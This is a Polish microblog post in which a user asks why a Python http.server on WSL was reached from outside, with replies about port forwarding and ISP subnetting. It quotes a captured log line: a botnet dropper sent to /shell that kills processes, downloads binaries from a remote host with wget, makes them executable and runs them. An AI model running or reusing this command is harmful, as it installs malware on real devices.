Wpis z mikrobloga

postawiłem na WSL http.server w pythonie i wypluł mi on w pewnym momencie taki oto log:

172.20.4x.x - - [30/Dec/2024 18:30:21] "GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+njvwa4+dbda7;wget+http:/\/fniew.eye-network.ru/dbda7;chmod+777+dbda7;./dbda7+jaws;rm+-rf+dbda7;wget+http:/\/fniew.eye-network.ru/wheiuwa4;chmod+777+wheiuwa4;./wheiuwa4+jaws;rm+-rf+wheiuwa4 HTTP/1.1" 404 -


zastanawiam się jakim cudem był on otwarty na świat skoro mam wewnętrzne IP? Mój ISP to mała, osiedlowa firemka i byłem zawsze pewny, że nic ode mnie nie ma prawa nasłuchiwać po drugiej stronie ISPowego switcha, który zapewne jest gdzieś w piwnicy (ale słabo znam się na sieciach).

Moja konfiguracja:
-podczas rozwiazywania problemow z proba polaczenia z tym serwerem z innych urzadzen w sieci ustawilem na routerze port forwarding na 5500 na adres 192.168.x.x mojego kompa z windowsem, na ktorym stoi WSL pod 172.20.5x.xx (juz usunalem ta regule)

-w windowsie port forwarding 192.168.x.x -> 172.20.5x.x (WSL) na 3000 i 5500, oraz 0.0.0.0 -> 172.20.5x.x na tych samych portach

czy ktoś potrafi wytłumaczyć co jest grane?

#siecikomputerowe #sieci #internet #hacking #security #hakujo #informatyka
  • 3
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

@klamkaodokna:
172.20 to nadal wewnętrzna adresacja. Masz podgląd do konfiguracji na głównym routerze? Obstawiam że maska 24 albo i więcej i wszyscy się widzą wzajemnie.
ISP upchał wielu klientów w 1 podsieci żeby zaoszczędzić na adresacji.
  • Odpowiedz
  • 0
@TenNorbert: nie mam, z korytarza idzie do mnie kabel a router domowy mam swój, którego isp nigdy nie dotykał i tak naprawdę nawet nie wiem co jest dalej z tylko zgaduję

Przez 172.20.4x idą wszystkie requesty do tego pythonowego serwera, nawet z mojego smartfona (mimo, że porty przekierowuje ze 192.168 na 172.20.5x)
  • Odpowiedz